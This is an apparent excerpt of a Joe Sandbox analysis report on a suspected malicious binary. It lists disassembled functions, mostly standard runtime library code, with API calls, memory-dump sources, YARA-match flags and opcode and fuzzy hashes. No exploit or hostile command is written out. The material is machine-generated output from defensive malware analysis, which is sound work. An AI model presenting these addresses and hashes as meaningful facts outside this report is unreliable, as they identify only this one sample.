                                                      Similarity
                                                      • API ID: AddressProc$LibraryLoad$ErrorLast
                                                      • String ID: advapi32.dll
                                                      • API String ID: 2340687224-4050573280
                                                      • Opcode ID: a8612e5b23a925facd6796a3e5b292861b9268635af447aec4c94fc110107543
                                                      • Instruction ID: 816d3110a002b142acfec0223beedaf8b8811a119c75c10c585e3e60892e27df
                                                      • Opcode Fuzzy Hash: a8612e5b23a925facd6796a3e5b292861b9268635af447aec4c94fc110107543
                                                      • Instruction Fuzzy Hash: EB21A4B2915710BFE7106F79DC48A6ABFECEF05B16F004A2AF541D3640DB7CA5408BA8
                                                      Function 046E24B7 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 63libraryloaderCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,046E671B), ref: 046E24C6
                                                      • GetProcAddress.KERNEL32(00000000,00446CDC), ref: 046E24D4
                                                      • GetProcAddress.KERNEL32(00000000,00446CF4), ref: 046E24E2
                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,00446D0C,?,?,?,046E671B), ref: 046E2510
                                                      • GetProcAddress.KERNEL32(00000000), ref: 046E2517
                                                      • GetLastError.KERNEL32(?,?,?,046E671B), ref: 046E2532
                                                      • GetLastError.KERNEL32(?,?,?,046E671B), ref: 046E253E
                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 046E2554
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 046E2562
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressProc$ErrorHandleLastModule$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                      • String ID: kernel32.dll
                                                      • API String ID: 4179531150-1793498882
                                                      • Opcode ID: 86a114dfe65ccc4fa04666bdd8c1bca5b9a7b223918886f6160c3780a9292853
                                                      • Instruction ID: 8c6d805b5136705fe9597eefc7a9138325f78f81afde182292b937833ba3307d
                                                      • Opcode Fuzzy Hash: 86a114dfe65ccc4fa04666bdd8c1bca5b9a7b223918886f6160c3780a9292853
                                                      • Instruction Fuzzy Hash: 6A11C2759023107FF7107B7A6DADA7B3BEDAE05A12710056AB402D3251FB78E900866C
                                                      Function 0043EEB2 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 154COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0044019F), ref: 0043EED5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: DecodePointer
                                                      • String ID: "1@$acos$asin$exp$log$log10$pow$sqrt
                                                      • API String ID: 3527080286-387934149
                                                      • Opcode ID: 282eee1a7bf40a219ff437852848af6664f81389b32cecd41840f86b0f9bdce7
                                                      • Instruction ID: 9fd4e678bf913fb8b46125665d9ae2d0c16e862613d5871dab2415aa518b1ef4
                                                      • Opcode Fuzzy Hash: 282eee1a7bf40a219ff437852848af6664f81389b32cecd41840f86b0f9bdce7
                                                      • Instruction Fuzzy Hash: A651BF7490050ADBCF14DF99E6485ADBBB0FB0D300F2551A7D481A6355C7B98D29CB1E
                                                      Function 00419756 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 55COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 00419778
                                                      • GetCurrentProcess.KERNEL32(000000FF,00000000), ref: 00419782
                                                      • DuplicateHandle.KERNEL32(00000000), ref: 00419789
                                                      • SafeRWList.LIBCONCRT ref: 004197A8
                                                        • Part of subcall function 00417777: Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00417788
                                                        • Part of subcall function 00417777: List.LIBCMT ref: 00417792
                                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 004197BA
                                                      • GetLastError.KERNEL32 ref: 004197C9
                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004197DF
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 004197ED
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: CurrentListProcess$AcquireConcurrency::details::_Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateErrorException@8HandleLastLock::_ReaderSafeThrowWriteWriterstd::invalid_argument::invalid_argument
                                                      • String ID: eventObject
                                                      • API String ID: 1999291547-1680012138
                                                      • Opcode ID: af56e6474bfbcfb1548dec2f01f626fb8f62d732f61f1ac0c92eedc387ce09ea
                                                      • Instruction ID: b565d633965123d241c47b701b73221d24ae2dfa48e938e47ac4bdd02f6dee76
                                                      • Opcode Fuzzy Hash: af56e6474bfbcfb1548dec2f01f626fb8f62d732f61f1ac0c92eedc387ce09ea
                                                      • Instruction Fuzzy Hash: 0C11A075500104EADB14EFA5CC49FEE77B8AF00701F20412BF416E21D1EB789E848A6D
                                                      Function 0041514E Relevance: 15.2, APIs: 10, Instructions: 175COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 00415259
                                                        • Part of subcall function 00414C6A: Concurrency::details::platform::__GetLogicalProcessorInformationEx.LIBCONCRT ref: 00414C7E
                                                      • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 00415282
                                                        • Part of subcall function 004130E4: Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 00413100
                                                      • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 004152A9
                                                      • Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 00415163
                                                        • Part of subcall function 00413148: __EH_prolog3_GS.LIBCMT ref: 0041314F
                                                        • Part of subcall function 00413148: GetCurrentProcess.KERNEL32(0045CB84,0045CB88,00000024), ref: 0041315E
                                                        • Part of subcall function 00413148: GetProcessAffinityMask.KERNEL32(00000000), ref: 00413165
                                                        • Part of subcall function 00413148: GetCurrentThread.KERNEL32 ref: 0041318D
                                                        • Part of subcall function 00413148: Concurrency::details::HardwareAffinity::HardwareAffinity.LIBCMT ref: 00413197
                                                      • Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 00415184
                                                      • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 004151BB
                                                      • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 004151FE
                                                      • Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 004152F1
                                                      • Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 00415315
                                                      • Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 00415322
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: Concurrency::details::$AffinityManager::Resource$ApplyRestrictions$InformationProcess$Topology$CaptureCurrentHardware$Affinity::CleanupConcurrency::details::platform::__FindGroupH_prolog3_LogicalMaskProcessorRestriction::Thread
                                                      • String ID:
                                                      • API String ID: 64082781-0
                                                      • Opcode ID: 1ecb225e08598ee27c8c099d749289d9fb610fb0746485e2ea13aa543c18698c
                                                      • Instruction ID: a544b122dba078d289a9d828bf0ebb9c492af17023c83a7e7c7f030abb93a1bc
                                                      • Opcode Fuzzy Hash: 1ecb225e08598ee27c8c099d749289d9fb610fb0746485e2ea13aa543c18698c
                                                      • Instruction Fuzzy Hash: 25617C71A00715DFDB18CFA5E8D26EEB7A1FB84306F24806ED44697252D739A981CF48
                                                      Function 046E53B5 Relevance: 15.2, APIs: 10, Instructions: 175COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 046E54C0
                                                        • Part of subcall function 046E4ED1: Concurrency::details::platform::__GetLogicalProcessorInformationEx.LIBCONCRT ref: 046E4EE5
                                                      • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 046E54E9
                                                        • Part of subcall function 046E334B: Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 046E3367
                                                      • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 046E5510
                                                      • Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 046E53CA
                                                        • Part of subcall function 046E33AF: __EH_prolog3_GS.LIBCMT ref: 046E33B6
                                                        • Part of subcall function 046E33AF: GetCurrentProcess.KERNEL32(0045CB84,0045CB88,00000024), ref: 046E33C5
                                                        • Part of subcall function 046E33AF: GetProcessAffinityMask.KERNEL32(00000000), ref: 046E33CC
                                                        • Part of subcall function 046E33AF: GetCurrentThread.KERNEL32 ref: 046E33F4
                                                        • Part of subcall function 046E33AF: Concurrency::details::HardwareAffinity::HardwareAffinity.LIBCMT ref: 046E33FE
                                                      • Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 046E53EB
                                                      • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 046E5422
                                                      • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 046E5465
                                                      • Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 046E5558
                                                      • Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 046E557C
                                                      • Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 046E5589
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Concurrency::details::$AffinityManager::Resource$ApplyRestrictions$InformationProcess$Topology$CaptureCurrentHardware$Affinity::CleanupConcurrency::details::platform::__FindGroupH_prolog3_LogicalMaskProcessorRestriction::Thread
                                                      • String ID:
                                                      • API String ID: 64082781-0
                                                      • Opcode ID: 1ecb225e08598ee27c8c099d749289d9fb610fb0746485e2ea13aa543c18698c
                                                      • Instruction ID: 248590ebb54d9aeaf6e751e18e911da5eb02c1a9541a0f4a95a00035293846d2
                                                      • Opcode Fuzzy Hash: 1ecb225e08598ee27c8c099d749289d9fb610fb0746485e2ea13aa543c18698c
                                                      • Instruction Fuzzy Hash: 9A617971A02315EFDB18CFA6E89167DB7E1BF4431AF24802DD44697292EB31B941CB48
                                                      Function 00431DF6 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _free.LIBCMT ref: 00431E0A
                                                        • Part of subcall function 0043347A: RtlFreeHeap.NTDLL(00000000,00000000,?,0043A108,?,00000000,?,00000000,?,0043A3AC,?,00000007,?,?,0043A7A0,?), ref: 00433490
                                                        • Part of subcall function 0043347A: GetLastError.KERNEL32(?,?,0043A108,?,00000000,?,00000000,?,0043A3AC,?,00000007,?,?,0043A7A0,?,?), ref: 004334A2
                                                      • _free.LIBCMT ref: 00431E16
                                                      • _free.LIBCMT ref: 00431E21
                                                      • _free.LIBCMT ref: 00431E2C
                                                      • _free.LIBCMT ref: 00431E37
                                                      • _free.LIBCMT ref: 00431E42
                                                      • _free.LIBCMT ref: 00431E4D
                                                      • _free.LIBCMT ref: 00431E58
                                                      • _free.LIBCMT ref: 00431E63
                                                      • _free.LIBCMT ref: 00431E71
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                      • Instruction ID: 55fbbdd4ea06f5b10c0744cf7494cbd8d712eafe635c256bcb453848a6529aa7
                                                      • Opcode Fuzzy Hash: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                      • Instruction Fuzzy Hash: 2711A7B6100108AFCB02EF55C852DD93F65EF18395F1190AAF9588B232D636DF519B84
                                                      Function 0470205D Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _free.LIBCMT ref: 04702071
                                                        • Part of subcall function 047036E1: HeapFree.KERNEL32(00000000,00000000,?,0470A36F,?,00000000,?,00000000,?,0470A613,?,00000007,?,?,0470AA07,?), ref: 047036F7
                                                        • Part of subcall function 047036E1: GetLastError.KERNEL32(?,?,0470A36F,?,00000000,?,00000000,?,0470A613,?,00000007,?,?,0470AA07,?,?), ref: 04703709
                                                      • _free.LIBCMT ref: 0470207D
                                                      • _free.LIBCMT ref: 04702088
                                                      • _free.LIBCMT ref: 04702093
                                                      • _free.LIBCMT ref: 0470209E
                                                      • _free.LIBCMT ref: 047020A9
                                                      • _free.LIBCMT ref: 047020B4
                                                      • _free.LIBCMT ref: 047020BF
                                                      • _free.LIBCMT ref: 047020CA
                                                      • _free.LIBCMT ref: 047020D8
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                      • Instruction ID: 368e4b391467078f1c9f93a8336b62189e2447d2a7b390d5aaf662841fcc5068
                                                      • Opcode Fuzzy Hash: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                      • Instruction Fuzzy Hash: F8117476502108FFDB01EF54C845DD93BA5EF05358B5181A5FE098B3A1DA33EE64EB80
                                                      Function 0042E1C2 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 200COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: __cftoe
                                                      • String ID: W(@$W(@
                                                      • API String ID: 4189289331-2771400755
                                                      • Opcode ID: bbe416c8d69575f9d93ce627a81c40a4a4bf106591ac0e44be9dd0909605bb26
                                                      • Instruction ID: 07d08be1f67778e7122509fe8e18c1c46be534b65d2bcfd2776667e36f53a30d
                                                      • Opcode Fuzzy Hash: bbe416c8d69575f9d93ce627a81c40a4a4bf106591ac0e44be9dd0909605bb26
                                                      • Instruction Fuzzy Hash: 97512832600211EBDB249B5BEC41BAF77A8EF49324F90425FF815A7282DB3DD900867D
                                                      Function 004286E0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 117COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _ValidateLocalCookies.LIBCMT ref: 0042870B
                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 00428713
                                                      • _ValidateLocalCookies.LIBCMT ref: 004287A1
                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 004287CC
                                                      • _ValidateLocalCookies.LIBCMT ref: 00428821
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                      • String ID: "1@$0fB$csm
                                                      • API String ID: 1170836740-3151313498
                                                      • Opcode ID: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                      • Instruction ID: bea877f61e034c6a042fa83f1e95de6e61d9a31ef2d1101b3af7d6bc6a73fe3e
                                                      • Opcode Fuzzy Hash: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                      • Instruction Fuzzy Hash: 2841F934B012289BCF10DF19DC45A9F7BB5AF84328F64815FE9146B392CB399D11CB99
                                                      Function 046F4AC4 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 104threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 046F4ADD
                                                        • Part of subcall function 046F4DAC: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,046F4810), ref: 046F4DBC
                                                      • Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 046F4AF2
                                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 046F4B01
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 046F4B0F
                                                      • Concurrency::details::FreeVirtualProcessorRoot::Affinitize.LIBCONCRT ref: 046F4B85
                                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 046F4BC5
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 046F4BD3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Concurrency::details::$Exception@8FreeProcessorRoot::ThrowVirtualstd::invalid_argument::invalid_argument$AffinitizeExecutionIdleObjectProxy::ResetSingleSuspendThreadWait
                                                      • String ID: "1@
                                                      • API String ID: 3151764488-1946750398
                                                      • Opcode ID: 3734a1ad1e391af5b1d37797e51a1a7898c33a57748dbc1e27873804117bc96e
                                                      • Instruction ID: 7a73898d81e84a2e0d134c0bf6770abdf1203e9b220bbf0e7151d261c75beea6
                                                      • Opcode Fuzzy Hash: 3734a1ad1e391af5b1d37797e51a1a7898c33a57748dbc1e27873804117bc96e
                                                      • Instruction Fuzzy Hash: 1D31D835A002149BDF08EF68CC80A6F77B5FF64214F2044A9DA559B745FF70F9028794
                                                      Function 047031A0 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2096f585af2949bbcbeb02ba378e27ab7de49007c7775bea8d51a9bce3371cac
                                                      • Instruction ID: 01d4063979c735712e48ff0136095b9989afe7bc8cdebc3eec8e5fcc6931ca32
                                                      • Opcode Fuzzy Hash: 2096f585af2949bbcbeb02ba378e27ab7de49007c7775bea8d51a9bce3371cac
                                                      • Instruction Fuzzy Hash: 8AC1B3B0A05249EFDB12DFA9C840BADBFF0AF09314F048199E954AB3D2D734A941CB65
                                                      Function 00430ED2 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00431EEA: GetLastError.KERNEL32(?,?,0042DFF5,00457910,00000010), ref: 00431EEE
                                                        • Part of subcall function 00431EEA: _free.LIBCMT ref: 00431F21
                                                        • Part of subcall function 00431EEA: SetLastError.KERNEL32(00000000), ref: 00431F62
                                                      • _memcmp.LIBVCRUNTIME ref: 0043117C
                                                      • _free.LIBCMT ref: 004311ED
                                                      • _free.LIBCMT ref: 00431206
                                                      • _free.LIBCMT ref: 00431238
                                                      • _free.LIBCMT ref: 00431241
                                                      • _free.LIBCMT ref: 0043124D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: _free$ErrorLast$_memcmp
                                                      • String ID: "1@
                                                      • API String ID: 4275183328-1946750398
                                                      • Opcode ID: 1403a73044b2a32c4151c19e3ee42d3d20986d24228a641b3762fb9bf04db679
                                                      • Instruction ID: d841e48d86bd86cadc75f002ab81185c2c7fc1b705aadc8dfd5545e49cc2a5d7
                                                      • Opcode Fuzzy Hash: 1403a73044b2a32c4151c19e3ee42d3d20986d24228a641b3762fb9bf04db679
                                                      • Instruction Fuzzy Hash: 6BB13975A012199FDB24DF18C894AAEB7B4FB08314F1086EAE949A7360D775AE90CF44
                                                      Function 04701139 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 266COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 04702151: GetLastError.KERNEL32(?,?,046FA9FC,?,00000000,?,046FCDF6,046D248B,00000000,?,00451F20), ref: 04702155
                                                        • Part of subcall function 04702151: _free.LIBCMT ref: 04702188
                                                        • Part of subcall function 04702151: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 047021C9
                                                      • _free.LIBCMT ref: 04701454
                                                      • _free.LIBCMT ref: 0470146D
                                                      • _free.LIBCMT ref: 0470149F
                                                      • _free.LIBCMT ref: 047014A8
                                                      • _free.LIBCMT ref: 047014B4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free$ErrorLast
                                                      • String ID: "1@$C
                                                      • API String ID: 3291180501-1527998705
                                                      • Opcode ID: eed3b7bc2709ca3cbefa9e0eb2039d909a82c3add560d3625423817520cd7e58
                                                      • Instruction ID: 3ad9fb12e19344664ea20e6cf7682c45aa1ae7bcd4176b6723654c26b958ac2d
                                                      • Opcode Fuzzy Hash: eed3b7bc2709ca3cbefa9e0eb2039d909a82c3add560d3625423817520cd7e58
                                                      • Instruction Fuzzy Hash: 19B1FA75A02219DFDB24DF19C884AADB7F4FB48304F5485AAE949A7390E731BE90CF40
                                                      Function 046F303B Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 106COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • Concurrency::details::SchedulerBase::GetRealizedChore.LIBCONCRT ref: 046F3061
                                                        • Part of subcall function 046E8AC2: RtlInterlockedPopEntrySList.NTDLL(?), ref: 046E8ACD
                                                      • SafeSQueue.LIBCONCRT ref: 046F307A
                                                      • Concurrency::location::_Assign.LIBCMT ref: 046F313A
                                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 046F315B
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 046F3169
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AssignBase::ChoreConcurrency::details::Concurrency::location::_EntryException@8InterlockedListQueueRealizedSafeSchedulerThrowstd::invalid_argument::invalid_argument
                                                      • String ID: "1@
                                                      • API String ID: 3496964030-1946750398
                                                      • Opcode ID: 17bd562b5d5d9d9cfdfa562d227ccadc57b46c4ced5fec5b9a2592468eba907b
                                                      • Instruction ID: ed67b3e7ba8576252d661e306cca22468a20570ed2bb4ff2166babb96eef5691
                                                      • Opcode Fuzzy Hash: 17bd562b5d5d9d9cfdfa562d227ccadc57b46c4ced5fec5b9a2592468eba907b
                                                      • Instruction Fuzzy Hash: 5731FF316006129FDB25EF69C850ABAB7B4FF44714B14815EDE8A8B342EB30F885CBD4
                                                      Function 046EC6D0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 45COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • atomic_compare_exchange.LIBCONCRT ref: 046EC6EC
                                                      • atomic_compare_exchange.LIBCONCRT ref: 046EC710
                                                      • std::_Cnd_initX.LIBCPMT ref: 046EC721
                                                      • std::_Cnd_initX.LIBCPMT ref: 046EC72F
                                                        • Part of subcall function 046D1370: __Mtx_unlock.LIBCPMT ref: 046D1377
                                                      • std::_Cnd_initX.LIBCPMT ref: 046EC73F
                                                        • Part of subcall function 046EC3FF: __Cnd_broadcast.LIBCPMT ref: 046EC406
                                                      • Concurrency::details::_RefCounter::_Release.LIBCONCRT ref: 046EC74D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Cnd_initstd::_$atomic_compare_exchange$Cnd_broadcastConcurrency::details::_Counter::_Mtx_unlockRelease
                                                      • String ID: "1@
                                                      • API String ID: 4258476935-1946750398
                                                      • Opcode ID: 376dd05e34ba58b9b10a3a6bde49d9aa46fe1a70e88f5238d9b7e165f1bafb18
                                                      • Instruction ID: 67b9d7a9b72faab840999e3c100505c0e5529cc058ca1234a038b059f9e71dca
                                                      • Opcode Fuzzy Hash: 376dd05e34ba58b9b10a3a6bde49d9aa46fe1a70e88f5238d9b7e165f1bafb18
                                                      • Instruction Fuzzy Hash: 8C01F275902601ABEB10FBA5CD44BADB798BF05318F100419E80497280FBB8FB018699
                                                      Function 0040C62E Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 37COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0040C68D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: Exception@8Throw
                                                      • String ID: +3@$W(@$W(@$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                      • API String ID: 2005118841-3836649521
                                                      • Opcode ID: 019f52a8e0bb9ff9f48767ebbe9764e79a713ad81fd208e44c7c6c06e0bc9c3a
                                                      • Instruction ID: 2fc2638fc067e40ae9a827f57275e2f0d78baaf5b1a7619cdab41ba603d7e27a
                                                      • Opcode Fuzzy Hash: 019f52a8e0bb9ff9f48767ebbe9764e79a713ad81fd208e44c7c6c06e0bc9c3a
                                                      • Instruction Fuzzy Hash: F0F0FC72900104AAC714DB54DC42FAB33945B15345F14867BED55B71C3EA7DA909CB9C
                                                      Function 00432144 Relevance: 12.2, APIs: 8, Instructions: 216COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0042D948,0042D948,?,?,?,00432395,00000001,00000001,23E85006), ref: 0043219E
                                                      • __alloca_probe_16.LIBCMT ref: 004321D6
                                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00432395,00000001,00000001,23E85006,?,?,?), ref: 00432224
                                                      • __alloca_probe_16.LIBCMT ref: 004322BB
                                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,23E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0043231E
                                                      • __freea.LIBCMT ref: 0043232B
                                                        • Part of subcall function 004336B7: RtlAllocateHeap.NTDLL(00000000,0040D886,00000000,?,004267AE,00000002,00000000,00000000,00000000,?,0040CD37,0040D886,00000004,00000000,00000000,00000000), ref: 004336E9
                                                      • __freea.LIBCMT ref: 00432334
